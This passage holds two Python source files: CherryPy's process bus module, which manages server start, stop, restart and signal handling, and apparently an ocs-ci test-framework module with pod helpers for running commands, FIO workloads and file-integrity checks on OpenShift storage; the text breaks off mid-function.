r"""An implementation of the Web Site Process Bus. This module is completely standalone, depending only on the stdlib. Web Site Process Bus -------------------- A Bus object is used to contain and manage site-wide behavior: daemonization, HTTP server start/stop, process reload, signal handling, drop privileges, PID file management, logging for all of these, and many more. In addition, a Bus object provides a place for each web framework to register code that runs in response to site-wide events (like process start and stop), or which controls or otherwise interacts with the site-wide components mentioned above. For example, a framework which uses file-based templates would add known template filenames to an autoreload component. Ideally, a Bus object will be flexible enough to be useful in a variety of invocation scenarios: 1. The deployer starts a site from the command line via a framework-neutral deployment script; applications from multiple frameworks are mixed in a single site. Command-line arguments and configuration files are used to define site-wide components such as the HTTP server, WSGI component graph, autoreload behavior, signal handling, etc. 2. The deployer starts a site via some other process, such as Apache; applications from multiple frameworks are mixed in a single site. Autoreload and signal handling (from Python at least) are disabled. 3. The deployer starts a site via a framework-specific mechanism; for example, when running tests, exploring tutorials, or deploying single applications from a single framework. The framework controls which site-wide components are enabled as it sees fit. The Bus object in this package uses topic-based publish-subscribe messaging to accomplish all this. A few topic channels are built in ('start', 'stop', 'exit', 'graceful', 'log', and 'main'). Frameworks and site containers are free to define their own. If a message is sent to a channel that has not been defined or has no listeners, there is no effect. In general, there should only ever be a single Bus object per process. Frameworks and site containers share a single Bus object by publishing messages and subscribing listeners. The Bus object works as a finite state machine which models the current state of the process. Bus methods move it from one state to another; those methods then publish to subscribed listeners on the channel for the new state.:: O | V STOPPING --> STOPPED --> EXITING -> X A A | | \___ | | \ | | V V STARTED <-- STARTING """ import atexit try: import ctypes except ImportError: """Google AppEngine is shipped without ctypes :seealso: http://stackoverflow.com/a/6523777/70170 """ ctypes = None import operator import os import sys import threading import time import traceback as _traceback import warnings import subprocess import functools import six # Here I save the value of os.getcwd(), which, if I am imported early enough, # will be the directory from which the startup script was run. This is needed # by _do_execv(), to change back to the original directory before execv()ing a # new process. This is a defense against the application having changed the # current working directory (which could make sys.executable "not found" if # sys.executable is a relative-path, and/or cause other problems). _startup_cwd = os.getcwd() class ChannelFailures(Exception): """Exception raised during errors on Bus.publish().""" delimiter = '\n' def __init__(self, *args, **kwargs): """Initialize ChannelFailures errors wrapper.""" super(ChannelFailures, self).__init__(*args, **kwargs) self._exceptions = list() def handle_exception(self): """Append the current exception to self.""" self._exceptions.append(sys.exc_info()[1]) def get_instances(self): """Return a list of seen exception instances.""" return self._exceptions[:] def __str__(self): """Render the list of errors, which happened in channel.""" exception_strings = map(repr, self.get_instances()) return self.delimiter.join(exception_strings) __repr__ = __str__ def __bool__(self): """Determine whether any error happened in channel.""" return bool(self._exceptions) __nonzero__ = __bool__ # Use a flag to indicate the state of the bus. class _StateEnum(object): class State(object): name = None def __repr__(self): return 'states.%s' % self.name def __setattr__(self, key, value): if isinstance(value, self.State): value.name = key object.__setattr__(self, key, value) states = _StateEnum() states.STOPPED = states.State() states.STARTING = states.State() states.STARTED = states.State() states.STOPPING = states.State() states.EXITING = states.State() try: import fcntl except ImportError: max_files = 0 else: try: max_files = os.sysconf('SC_OPEN_MAX') except AttributeError: max_files = 1024 class Bus(object): """Process state-machine and messenger for HTTP site deployment. All listeners for a given channel are guaranteed to be called even if others at the same channel fail. Each failure is logged, but execution proceeds on to the next listener. The only way to stop all processing from inside a listener is to raise SystemExit and stop the whole server. """ states = states state = states.STOPPED execv = False max_cloexec_files = max_files def __init__(self): """Initialize pub/sub bus.""" self.execv = False self.state = states.STOPPED channels = 'start', 'stop', 'exit', 'graceful', 'log', 'main' self.listeners = dict( (channel, set()) for channel in channels ) self._priorities = {} def subscribe(self, channel, callback=None, priority=None): """Add the given callback at the given channel (if not present). If callback is None, return a partial suitable for decorating the callback. """ if callback is None: return functools.partial( self.subscribe, channel, priority=priority, ) ch_listeners = self.listeners.setdefault(channel, set()) ch_listeners.add(callback) if priority is None: priority = getattr(callback, 'priority', 50) self._priorities[(channel, callback)] = priority def unsubscribe(self, channel, callback): """Discard the given callback (if present).""" listeners = self.listeners.get(channel) if listeners and callback in listeners: listeners.discard(callback) del self._priorities[(channel, callback)] def publish(self, channel, *args, **kwargs): """Return output of all subscribers for the given channel.""" if channel not in self.listeners: return [] exc = ChannelFailures() output = [] raw_items = ( (self._priorities[(channel, listener)], listener) for listener in self.listeners[channel] ) items = sorted(raw_items, key=operator.itemgetter(0)) for priority, listener in items: try: output.append(listener(*args, **kwargs)) except KeyboardInterrupt: raise except SystemExit: e = sys.exc_info()[1] # If we have previous errors ensure the exit code is non-zero if exc and e.code == 0: e.code = 1 raise except Exception: exc.handle_exception() if channel == 'log': # Assume any further messages to 'log' will fail. pass else: self.log('Error in %r listener %r' % (channel, listener), level=40, traceback=True) if exc: raise exc return output def _clean_exit(self): """Assert that the Bus is not running in atexit handler callback.""" if self.state != states.EXITING: warnings.warn( 'The main thread is exiting, but the Bus is in the %r state; ' 'shutting it down automatically now. You must either call ' 'bus.block() after start(), or call bus.exit() before the ' 'main thread exits.' % self.state, RuntimeWarning) self.exit() def start(self): """Start all services.""" atexit.register(self._clean_exit) self.state = states.STARTING self.log('Bus STARTING') try: self.publish('start') self.state = states.STARTED self.log('Bus STARTED') except (KeyboardInterrupt, SystemExit): raise except Exception: self.log('Shutting down due to error in start listener:', level=40, traceback=True) e_info = sys.exc_info()[1] try: self.exit() except Exception: # Any stop/exit errors will be logged inside publish(). pass # Re-raise the original error raise e_info def exit(self): """Stop all services and prepare to exit the process.""" exitstate = self.state EX_SOFTWARE = 70 try: self.stop() self.state = states.EXITING self.log('Bus EXITING') self.publish('exit') # This isn't strictly necessary, but it's better than seeing # "Waiting for child threads to terminate..." and then nothing. self.log('Bus EXITED') except Exception: # This method is often called asynchronously (whether thread, # signal handler, console handler, or atexit handler), so we # can't just let exceptions propagate out unhandled. # Assume it's been logged and just die. os._exit(EX_SOFTWARE) if exitstate == states.STARTING: # exit() was called before start() finished, possibly due to # Ctrl-C because a start listener got stuck. In this case, # we could get stuck in a loop where Ctrl-C never exits the # process, so we just call os.exit here. os._exit(EX_SOFTWARE) def restart(self): """Restart the process (may close connections). This method does not restart the process from the calling thread; instead, it stops the bus and asks the main thread to call execv. """ self.execv = True self.exit() def graceful(self): """Advise all services to reload.""" self.log('Bus graceful') self.publish('graceful') def block(self, interval=0.1): """Wait for the EXITING state, KeyboardInterrupt or SystemExit. This function is intended to be called only by the main thread. After waiting for the EXITING state, it also waits for all threads to terminate, and then calls os.execv if self.execv is True. This design allows another thread to call bus.restart, yet have the main thread perform the actual execv call (required on some platforms). """ try: self.wait(states.EXITING, interval=interval, channel='main') except (KeyboardInterrupt, IOError): # The time.sleep call might raise # "IOError: [Errno 4] Interrupted function call" on KBInt. self.log('Keyboard Interrupt: shutting down bus') self.exit() except SystemExit: self.log('SystemExit raised: shutting down bus') self.exit() raise # Waiting for ALL child threads to finish is necessary on OS X. # See https://github.com/cherrypy/cherrypy/issues/581. # It's also good to let them all shut down before allowing # the main thread to call atexit handlers. # See https://github.com/cherrypy/cherrypy/issues/751. self.log('Waiting for child threads to terminate...') for t in threading.enumerate(): # Validate the we're not trying to join the MainThread # that will cause a deadlock and the case exist when # implemented as a windows service and in any other case # that another thread executes cherrypy.engine.exit() if ( t != threading.currentThread() and not isinstance(t, threading._MainThread) and # Note that any dummy (external) threads are # always daemonic. not t.daemon ): self.log('Waiting for thread %s.' % t.getName()) t.join() if self.execv: self._do_execv() def wait(self, state, interval=0.1, channel=None): """Poll for the given state(s) at intervals; publish to channel.""" if isinstance(state, (tuple, list)): states = state else: states = [state] while self.state not in states: time.sleep(interval) self.publish(channel) def _do_execv(self): """Re-execute the current process. This must be called from the main thread, because certain platforms (OS X) don't allow execv to be called in a child thread very well. """ try: args = self._get_true_argv() except NotImplementedError: """It's probably win32 or GAE""" args = [sys.executable] + self._get_interpreter_argv() + sys.argv self.log('Re-spawning %s' % ' '.join(args)) self._extend_pythonpath(os.environ) if sys.platform[:4] == 'java': from _systemrestart import SystemRestart raise SystemRestart else: if sys.platform == 'win32': args = ['"%s"' % arg for arg in args] os.chdir(_startup_cwd) if self.max_cloexec_files: self._set_cloexec() os.execv(sys.executable, args) @staticmethod def _get_interpreter_argv(): """Retrieve current Python interpreter's arguments. Returns empty tuple in case of frozen mode, uses built-in arguments reproduction function otherwise. Frozen mode is possible for the app has been packaged into a binary executable using py2exe. In this case the interpreter's arguments are already built-in into that executable. :seealso: https://github.com/cherrypy/cherrypy/issues/1526 Ref: https://pythonhosted.org/PyInstaller/runtime-information.html """ return ([] if getattr(sys, 'frozen', False) else subprocess._args_from_interpreter_flags()) @staticmethod def _get_true_argv(): """Retrieve all real arguments of the python interpreter. ...even those not listed in ``sys.argv`` :seealso: http://stackoverflow.com/a/28338254/595220 :seealso: http://stackoverflow.com/a/6683222/595220 :seealso: http://stackoverflow.com/a/28414807/595220 """ try: char_p = ctypes.c_char_p if six.PY2 else ctypes.c_wchar_p argv = ctypes.POINTER(char_p)() argc = ctypes.c_int() ctypes.pythonapi.Py_GetArgcArgv( ctypes.byref(argc), ctypes.byref(argv), ) _argv = argv[:argc.value] # The code below is trying to correctly handle special cases. # `-c`'s argument interpreted by Python itself becomes `-c` as # well. Same applies to `-m`. This snippet is trying to survive # at least the case with `-m` # Ref: https://github.com/cherrypy/cherrypy/issues/1545 # Ref: python/cpython@418baf9 argv_len, is_command, is_module = len(_argv), False, False try: m_ind = _argv.index('-m') if m_ind < argv_len - 1 and _argv[m_ind + 1] in ('-c', '-m'): """ In some older Python versions `-m`'s argument may be substituted with `-c`, not `-m` """ is_module = True except (IndexError, ValueError): m_ind = None try: c_ind = _argv.index('-c') if m_ind < argv_len - 1 and _argv[c_ind + 1] == '-c': is_command = True except (IndexError, ValueError): c_ind = None if is_module: """It's containing `-m -m` sequence of arguments""" if is_command and c_ind < m_ind: """There's `-c -c` before `-m`""" raise RuntimeError( "Cannot reconstruct command from '-c'. Ref: " 'https://github.com/cherrypy/cherrypy/issues/1545') # Survive module argument here original_module = sys.argv[0] if not os.access(original_module, os.R_OK): """There's no such module exist""" raise AttributeError( "{} doesn't seem to be a module " 'accessible by current user'.format(original_module)) del _argv[m_ind:m_ind + 2] # remove `-m -m` # ... and substitute it with the original module path: _argv.insert(m_ind, original_module) elif is_command: """It's containing just `-c -c` sequence of arguments""" raise RuntimeError( "Cannot reconstruct command from '-c'. " 'Ref: https://github.com/cherrypy/cherrypy/issues/1545') except AttributeError: """It looks Py_GetArgcArgv is completely absent in some environments It is known, that there's no Py_GetArgcArgv in MS Windows and ``ctypes`` module is completely absent in Google AppEngine :seealso: https://github.com/cherrypy/cherrypy/issues/1506 :seealso: https://github.com/cherrypy/cherrypy/issues/1512 :ref: http://bit.ly/2gK6bXK """ raise NotImplementedError else: return _argv @staticmethod def _extend_pythonpath(env): """Prepend current working dir to PATH environment variable if needed. If sys.path[0] is an empty string, the interpreter was likely invoked with -m and the effective path is about to change on re-exec. Add the current directory to $PYTHONPATH to ensure that the new process sees the same path. This issue cannot be addressed in the general case because Python cannot reliably reconstruct the original command line (http://bugs.python.org/issue14208). (This idea filched from tornado.autoreload) """ path_prefix = '.' + os.pathsep existing_path = env.get('PYTHONPATH', '') needs_patch = ( sys.path[0] == '' and not existing_path.startswith(path_prefix) ) if needs_patch: env['PYTHONPATH'] = path_prefix + existing_path def _set_cloexec(self): """Set the CLOEXEC flag on all open files (except stdin/out/err). If self.max_cloexec_files is an integer (the default), then on platforms which support it, it represents the max open files setting for the operating system. This function will be called just before the process is restarted via os.execv() to prevent open files from persisting into the new process. Set self.max_cloexec_files to 0 to disable this behavior. """ for fd in range(3, self.max_cloexec_files): # skip stdin/out/err try: flags = fcntl.fcntl(fd, fcntl.F_GETFD) except IOError: continue fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC) def stop(self): """Stop all services.""" self.state = states.STOPPING self.log('Bus STOPPING') self.publish('stop') self.state = states.STOPPED self.log('Bus STOPPED') def start_with_callback(self, func, args=None, kwargs=None): """Start 'func' in a new thread T, then start self (and return T).""" if args is None: args = () if kwargs is None: kwargs = {} args = (func,) + args def _callback(func, *a, **kw): self.wait(states.STARTED) func(*a, **kw) t = threading.Thread(target=_callback, args=args, kwargs=kwargs) t.setName('Bus Callback ' + t.getName()) t.start() self.start() return t def log(self, msg='', level=20, traceback=False): """Log the given message. Append the last traceback if requested.""" if traceback: msg += '\n' + ''.join(_traceback.format_exception(*sys.exc_info())) self.publish('log', msg, level) bus = Bus()
pod.py
""" Pod related functionalities and context info Each pod in the openshift cluster will have a corresponding pod object """ import logging import os import re import yaml import tempfile import time import calendar from threading import Thread import base64 from semantic_version import Version from ocs_ci.ocs.bucket_utils import craft_s3_command from ocs_ci.ocs.ocp import OCP, verify_images_upgraded from ocs_ci.helpers import helpers from ocs_ci.helpers.proxy import update_container_with_proxy_env from ocs_ci.ocs import constants, defaults, node, workload, ocp from ocs_ci.framework import config from ocs_ci.ocs.exceptions import ( CommandFailed, NonUpgradedImagesFoundError, ResourceWrongStatusException, TimeoutExpiredError, UnavailableResourceException, ResourceNotFoundError, ) from ocs_ci.ocs.utils import setup_ceph_toolbox, get_pod_name_by_pattern from ocs_ci.ocs.resources.ocs import OCS from ocs_ci.ocs.resources.job import get_job_obj, get_jobs_with_prefix from ocs_ci.utility import templating from ocs_ci.utility.utils import ( run_cmd, check_timeout_reached, TimeoutSampler, get_ocp_version, ) from ocs_ci.utility.utils import check_if_executable_in_path from ocs_ci.utility.retry import retry logger = logging.getLogger(__name__) FIO_TIMEOUT = 600 TEXT_CONTENT = ( "Lorem ipsum dolor sit amet, consectetur adipiscing elit, " "sed do eiusmod tempor incididunt ut labore et dolore magna " "aliqua. Ut enim ad minim veniam, quis nostrud exercitation " "ullamco laboris nisi ut aliquip ex ea commodo consequat. " "Duis aute irure dolor in reprehenderit in voluptate velit " "esse cillum dolore eu fugiat nulla pariatur. Excepteur sint " "occaecat cupidatat non proident, sunt in culpa qui officia " "deserunt mollit anim id est laborum." ) TEST_FILE = "/var/lib/www/html/test" FEDORA_TEST_FILE = "/mnt/test" class Pod(OCS): """ Handles per pod related context """ def __init__(self, **kwargs): """ Initializer function kwargs: Copy of ocs/defaults.py::<some pod> dictionary """ self.pod_data = kwargs # configure http[s]_proxy env variable, if applicable update_container_with_proxy_env(self.pod_data) super(Pod, self).__init__(**kwargs) with tempfile.NamedTemporaryFile( mode="w+", prefix="POD_", delete=False ) as temp_info: self.temp_yaml = temp_info.name self._name = self.pod_data.get("metadata").get("name") self._labels = self.get_labels() self._roles = [] self.ocp = OCP( api_version=defaults.API_VERSION, kind=constants.POD, namespace=self.namespace, ) self.fio_thread = None # TODO: get backend config !! self.wl_obj = None self.wl_setup_done = False @property def name(self): return self._name @property def namespace(self): return self._namespace @property def roles(self): return self._roles @property def labels(self): return self._labels @property def restart_count(self): return self.get().get("status").get("containerStatuses")[0].get("restartCount") def __setattr__(self, key, val): self.__dict__[key] = val def add_role(self, role): """ Adds a new role for this pod Args: role (str): New role to be assigned for this pod """ self._roles.append(role) def get_fio_results(self, timeout=FIO_TIMEOUT): """ Get FIO execution results Returns: dict: Dictionary represents the FIO execution results Raises: Exception: In case of exception from FIO """ logger.info(f"Waiting for FIO results from pod {self.name}") try: result = self.fio_thread.result(timeout) if result: return yaml.safe_load(result) raise CommandFailed(f"FIO execution results: {result}.") except CommandFailed as ex: logger.exception(f"FIO failed: {ex}") raise except Exception as ex: logger.exception(f"Found Exception: {ex}") raise def exec_cmd_on_pod( self, command, out_yaml_format=True, secrets=None, timeout=600, **kwargs ): """ Execute a command on a pod (e.g. oc rsh) Args: command (str): The command to execute on the given pod out_yaml_format (bool): whether to return yaml loaded python object OR to return raw output secrets (list): A list of secrets to be masked with asterisks This kwarg is popped in order to not interfere with subprocess.run(``**kwargs``) timeout (int): timeout for the exec_oc_cmd, defaults to 600 seconds Returns: Munch Obj: This object represents a returned yaml file """ rsh_cmd = f"rsh {self.name} " rsh_cmd += command return self.ocp.exec_oc_cmd( rsh_cmd, out_yaml_format, secrets=secrets, timeout=timeout, **kwargs ) def exec_s3_cmd_on_pod(self, command, mcg_obj=None): """ Execute an S3 command on a pod Args: mcg_obj (MCG): An MCG object containing the MCG S3 connection credentials command (str): The command to execute on the given pod Returns: Munch Obj: This object represents a returned yaml file """ return self.exec_cmd_on_pod( craft_s3_command(command, mcg_obj), out_yaml_format=False, secrets=[mcg_obj.access_key_id, mcg_obj.access_key, mcg_obj.s3_endpoint] if mcg_obj else None, ) def exec_sh_cmd_on_pod(self, command, sh="bash"): """ Execute a pure bash command on a pod via oc exec where you can use bash syntaxt like &&, ||, ;, for loop and so on. Args: command (str): The command to execute on the given pod Returns: str: stdout of the command """ cmd = f'exec {self.name} -- {sh} -c "{command}"' return self.ocp.exec_oc_cmd(cmd, out_yaml_format=False) def get_labels(self): """ Get labels from pod Raises: NotFoundError: If resource not found Returns: dict: All the openshift labels on a given pod """ return self.pod_data.get("metadata").get("labels") def exec_ceph_cmd(self, ceph_cmd, format="json-pretty"): """ Execute a Ceph command on the Ceph tools pod Args: ceph_cmd (str): The Ceph command to execute on the Ceph tools pod format (str): The returning output format of the Ceph command Returns: dict: Ceph command output Raises: CommandFailed: In case the pod is not a toolbox pod """ if "rook-ceph-tools" not in self.labels.values(): raise CommandFailed("Ceph commands can be executed only on toolbox pod") ceph_cmd = ceph_cmd if format: ceph_cmd += f" --format {format}" out = self.exec_cmd_on_pod(ceph_cmd) # For some commands, like "ceph fs ls", the returned output is a list if isinstance(out, list): return [item for item in out if item] return out def get_storage_path(self, storage_type="fs"): """ Get the pod volume mount path or device path Returns: str: The mount path of the volume on the pod (e.g. /var/lib/www/html/) if storage_type is fs else device path of raw block pv """ # TODO: Allow returning a path of a specified volume of a specified # container if storage_type == "block": return ( self.pod_data.get("spec") .get("containers")[0] .get("volumeDevices")[0] .get("devicePath") ) return ( self.pod_data.get("spec") .get("containers")[0] .get("volumeMounts")[0] .get("mountPath") ) def workload_setup(self, storage_type, jobs=1): """ Do setup on pod for running FIO Args: storage_type (str): 'fs' or 'block' jobs (int): Number of jobs to execute FIO """ work_load = "fio" name = f"test_workload_{work_load}" path = self.get_storage_path(storage_type) # few io parameters for Fio self.wl_obj = workload.WorkLoad(name, path, work_load, storage_type, self, jobs) assert self.wl_obj.setup(), f"Setup for FIO failed on pod {self.name}" self.wl_setup_done = True def run_io( self, storage_type, size, io_direction="rw", rw_ratio=75, jobs=1, runtime=60, depth=4, rate="1m", rate_process="poisson", fio_filename=None, bs="4K", end_fsync=0, invalidate=None, ): """ Execute FIO on a pod This operation will run in background and will store the results in 'self.thread.result()'. In order to wait for the output and not continue with the test until FIO is done, call self.thread.result() right after calling run_io. See tests/manage/test_pvc_deletion_during_io.py::test_run_io for usage of FIO Args: storage_type (str): 'fs' or 'block' size (str): Size in MB, e.g. '200M' io_direction (str): Determines the operation: 'ro', 'wo', 'rw' (default: 'rw') rw_ratio (int): Determines the reads and writes using a <rw_ratio>%/100-<rw_ratio>% (e.g. the default is 75 which means it is 75%/25% which equivalent to 3 reads are performed for every 1 write) jobs (int): Number of jobs to execute FIO runtime (int): Number of seconds IO should run for depth (int): IO depth rate (str): rate of IO default 1m, e.g. 16k rate_process (str): kind of rate process default poisson, e.g. poisson fio_filename(str): Name of fio file created on app pod's mount point bs (str): Block size, e.g. 4K end_fsync (int): If 1, fio will sync file contents when a write stage has completed. Fio default is 0 invalidate (bool): Invalidate the buffer/page cache parts of the files to be used prior to starting I/O """ if not self.wl_setup_done: self.workload_setup(storage_type=storage_type, jobs=jobs) if io_direction == "rw": self.io_params = templating.load_yaml(constants.FIO_IO_RW_PARAMS_YAML) self.io_params["rwmixread"] = rw_ratio else: self.io_params = templating.load_yaml(constants.FIO_IO_PARAMS_YAML) if invalidate is not None: self.io_params["invalidate"] = invalidate self.io_params["runtime"] = runtime size = size if isinstance(size, str) else f"{size}G" self.io_params["size"] = size if fio_filename: self.io_params["filename"] = fio_filename self.io_params["iodepth"] = depth self.io_params["rate"] = rate self.io_params["rate_process"] = rate_process self.io_params["bs"] = bs if end_fsync: self.io_params["end_fsync"] = end_fsync self.fio_thread = self.wl_obj.run(**self.io_params) def fillup_fs(self, size, fio_filename=None): """ Execute FIO on a pod to fillup a file This will run sequantial IO of 1MB block size to fill up the fill with data This operation will run in background and will store the results in 'self.thread.result()'. In order to wait for the output and not continue with the test until FIO is done, call self.thread.result() right after calling run_io. See tests/manage/test_pvc_deletion_during_io.py::test_run_io for usage of FIO Args: size (str): Size in MB, e.g. '200M' fio_filename(str): Name of fio file created on app pod's mount point """ if not self.wl_setup_done: self.workload_setup(storage_type="fs", jobs=1) self.io_params = templating.load_yaml(constants.FIO_IO_FILLUP_PARAMS_YAML) size = size if isinstance(size, str) else f"{size}M" self.io_params["size"] = size if fio_filename: self.io_params["filename"] = fio_filename self.fio_thread = self.wl_obj.run(**self.io_params) def run_git_clone(self, skip_install=True): """ Execute git clone on a pod to simulate a Jenkins user Args: skip_install (bool): By default True, skips git package installation in pod """ name = "test_workload" work_load = "jenkins" wl = workload.WorkLoad( name=name, work_load=work_load, pod=self, path=self.get_storage_path() ) if not skip_install: assert wl.setup(), "Setup for git failed" wl.run() def install_packages(self, packages): """ Install packages in a Pod Args: packages (list): List of packages to install """ if isinstance(packages, list): packages = " ".join(packages) cmd = f"yum install {packages} -y" self.exec_cmd_on_pod(cmd, out_yaml_format=False) def copy_to_server(self, server, authkey, localpath, remotepath, user=None): """ Upload a file from pod to server Args: server (str): Name of the server to upload authkey (str): Authentication file (.pem file) localpath (str): Local file/dir in pod to upload remotepath (str): Target path on the remote server user (str): User name to connect to server """ if not user: user = "root" cmd = ( f'scp -i {authkey} -o "StrictHostKeyChecking no"' f" -r {localpath} {user}@{server}:{remotepath}" ) self.exec_cmd_on_pod(cmd, out_yaml_format=False) def exec_cmd_on_node(self, server, authkey, cmd, user=None): """ Run command on a remote server from pod Args: server (str): Name of the server to run the command authkey (str): Authentication file (.pem file) cmd (str): command to run on server from pod user (str): User name to connect to server """ if not user: user = "root" cmd = f'ssh -i {authkey} -o "StrictHostKeyChecking no" {user}@{server} {cmd}' self.exec_cmd_on_pod(cmd, out_yaml_format=False) def get_memory(self, container_name): """ Get the pod memory size Args: container_name (str): The name of the container to look for Returns: str: The container memory size (e.g. '5Gi') """ pod_containers = self.pod_data.get("spec").get("containers") matched_containers = [ c for c in pod_containers if c.get("name") == container_name ] if len(matched_containers) > 1: logger.error( f"Multiple containers, of the same name, were found: {[c.get('name') for c in matched_containers]}" ) container = matched_containers[0] return container.get("resources").get("limits").get("memory") def get_node(self): """ Gets the node name Returns: str: Node name """ if config.ENV_DATA.get( "platform", "" ).lower() == "aws" and config.DEPLOYMENT.get("local_storage"): return self.pod_data["spec"]["nodeSelector"]["kubernetes.io/hostname"] else: return self.pod_data["spec"]["nodeName"] # Helper functions for Pods def get_all_pods( namespace=None, selector=None, selector_label="app", exclude_selector=False, wait=False, ): """ Get all pods in a namespace. Args: namespace (str): Name of the namespace If namespace is None - get all pods selector (list) : List of the resource selector to search with. Example: ['alertmanager','prometheus'] selector_label (str): Label of selector (default: app). exclude_selector (bool): If list of the resource selector not to search with Returns: list: List of Pod objects """ ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace) # In case of >4 worker nodes node failures automatic failover of pods to # other nodes will happen. # So, we are waiting for the pods to come up on new node if wait: wait_time = 180 logger.info(f"Waiting for {wait_time}s for the pods to stabilize") time.sleep(wait_time) pods = ocp_pod_obj.get()["items"] if selector: if exclude_selector: pods_new = [ pod for pod in pods if pod["metadata"].get("labels", {}).get(selector_label) not in selector ] else: pods_new = [ pod for pod in pods if pod["metadata"].get("labels", {}).get(selector_label) in selector ] pods = pods_new pod_objs = [Pod(**pod) for pod in pods] return pod_objs def get_ceph_tools_pod(): """ Get the Ceph tools pod Returns: Pod object: The Ceph tools pod object """ ocp_pod_obj = OCP( kind=constants.POD, namespace=config.ENV_DATA["cluster_namespace"] ) ct_pod_items = ocp_pod_obj.get(selector="app=rook-ceph-tools")["items"] if not ct_pod_items: # setup ceph_toolbox pod if the cluster has been setup by some other CI setup_ceph_toolbox() ct_pod_items = ocp_pod_obj.get(selector="app=rook-ceph-tools")["items"] assert ct_pod_items, "No Ceph tools pod found" # In the case of node failure, the CT pod will be recreated with the old # one in status Terminated. Therefore, need to filter out the Terminated pod running_ct_pods = list() for pod in ct_pod_items: if ( ocp_pod_obj.get_resource_status(pod.get("metadata").get("name")) == constants.STATUS_RUNNING ): running_ct_pods.append(pod) assert running_ct_pods, "No running Ceph tools pod found" ceph_pod = Pod(**running_ct_pods[0]) return ceph_pod def get_csi_provisioner_pod(interface): """ Get the provisioner pod based on interface Returns: Pod object: The provisioner pod object based on iterface """ ocp_pod_obj = OCP( kind=constants.POD, namespace=config.ENV_DATA["cluster_namespace"] ) selector = ( "app=csi-rbdplugin-provisioner" if ( interface == constants.CEPHBLOCKPOOL or interface == constants.CEPHBLOCKPOOL_THICK ) else "app=csi-cephfsplugin-provisioner" ) provision_pod_items = ocp_pod_obj.get(selector=selector)["items"] assert provision_pod_items, f"No {interface} provisioner pod found" provisioner_pod = ( Pod(**provision_pod_items[0]).name, Pod(**provision_pod_items[1]).name, ) return provisioner_pod def get_csi_snapshoter_pod(): """ Get the csi snapshot controller pod Returns: Pod object: csi snapshot controller pod """ ocp_pod_obj = OCP( kind=constants.POD, namespace="openshift-cluster-storage-operator" ) selector = "app=csi-snapshot-controller" snapshotner_pod = ocp_pod_obj.get(selector=selector)["items"] snapshotner_pod = Pod(**snapshotner_pod[0]).name return snapshotner_pod def get_rgw_pods(rgw_label=constants.RGW_APP_LABEL, namespace=None): """ Fetches info about rgw pods in the cluster Args: rgw_label (str): label associated with rgw pods (default: defaults.RGW_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: none) Returns: list: Pod objects of rgw pods """ namespace = namespace or config.ENV_DATA["cluster_namespace"] rgws = get_pods_having_label(rgw_label, namespace) return [Pod(**rgw) for rgw in rgws] def get_ocs_operator_pod(ocs_label=constants.OCS_OPERATOR_LABEL, namespace=None): """ Fetches info about rgw pods in the cluster Args: ocs_label (str): label associated with ocs_operator pod (default: defaults.OCS_OPERATOR_LABEL) namespace (str): Namespace in which ceph cluster lives (default: none) Returns: Pod object: ocs_operator pod object """ namespace = namespace or config.ENV_DATA["cluster_namespace"] ocs_operator = get_pods_having_label(ocs_label, namespace) ocs_operator_pod = Pod(**ocs_operator[0]) return ocs_operator_pod def list_ceph_images(pool_name="rbd"): """ Args: pool_name (str): Name of the pool to get the ceph images Returns (List): List of RBD images in the pool """ ct_pod = get_ceph_tools_pod() return ct_pod.exec_ceph_cmd(ceph_cmd=f"rbd ls {pool_name}", format="json") @retry(TypeError, tries=5, delay=2, backoff=1) def check_file_existence(pod_obj, file_path): """ Check if file exists inside the pod Args: pod_obj (Pod): The object of the pod file_path (str): The full path of the file to look for inside the pod Returns: bool: True if the file exist, False otherwise """ try: check_if_executable_in_path(pod_obj.exec_cmd_on_pod("which find")) except CommandFailed: pod_obj.install_packages("findutils") ret = pod_obj.exec_cmd_on_pod(f'bash -c "find {file_path}"') if re.search(file_path, ret): return True return False def get_file_path(pod_obj, file_name): """ Get the full path of the file Args: pod_obj (Pod): The object of the pod file_name (str): The name of the file for which path to get Returns: str: The full path of the file """ path = ( pod_obj.get() .get("spec") .get("containers")[0] .get("volumeMounts")[0] .get("mountPath") ) file_path = os.path.join(path, file_name) return file_path def cal_md5sum(pod_obj, file_name, block=False): """ Calculates the md5sum of the file Args: pod_obj (Pod): The object of the pod file_name (str): The name of the file for which md5sum to be calculated block (bool): True if the volume mode of PVC used on pod is 'Block'. file_name will be the devicePath in this case. Returns: str: The md5sum of the file """ file_path = file_name if block else get_file_path(pod_obj, file_name) md5sum_cmd_out = pod_obj.exec_cmd_on_pod( command=f'bash -c "md5sum {file_path}"', out_yaml_format=False ) md5sum = md5sum_cmd_out.split()[0] logger.info(f"md5sum of file {file_name}: {md5sum}") return md5sum def verify_data_integrity(pod_obj, file_name, original_md5sum, block=False): """ Verifies existence and md5sum of file created from first pod Args: pod_obj (Pod): The object of the pod file_name (str): The name of the file for which md5sum to be calculated original_md5sum (str): The original md5sum of the file block (bool): True if the volume mode of PVC used on pod is 'Block'. file_name will be the devicePath in this case. Returns: bool: True if the file exists and md5sum matches Raises: AssertionError: If file doesn't exist or md5sum mismatch """ file_path = file_name if block else get_file_path(pod_obj, file_name) assert check_file_existence(pod_obj, file_path), f"File {file_name} doesn't exists" current_md5sum = cal_md5sum(pod_obj, file_name, block) logger.info(f"Original md5sum of file: {original_md5sum}") logger.info(f"Current md5sum of file: {current_md5sum}") assert current_md5sum == original_md5sum, "Data corruption found" logger.info(f"File {file_name} exists and md5sum matches") return True def get_fio_rw_iops(pod_obj): """ Execute FIO on a pod Args: pod_obj (Pod): The object of the pod """ fio_result = pod_obj.get_fio_results() logging.info(f"FIO output: {fio_result}") logging.info("IOPs after FIO:") logging.info(f"Read: {fio_result.get('jobs')[0].get('read').get('iops')}") logging.info(f"Write: {fio_result.get('jobs')[0].get('write').get('iops')}") def run_io_in_bg(pod_obj, expect_to_fail=False, fedora_dc=False): """ Run I/O in the background Args: pod_obj (Pod): The object of the pod expect_to_fail (bool): True for the command to be expected to fail (disruptive operations), False otherwise fedora_dc (bool): set to False by default. If set to True, it runs IO in background on a fedora dc pod. Returns: Thread: A thread of the I/O execution """ logger.info(f"Running I/O on pod {pod_obj.name}") def exec_run_io_cmd(pod_obj, expect_to_fail, fedora_dc): """ Execute I/O """ try: # Writing content to a new file every 0.01 seconds. # Without sleep, the device will run out of space very quickly - # 5-10 seconds for a 5GB device if fedora_dc: FILE = FEDORA_TEST_FILE else: FILE = 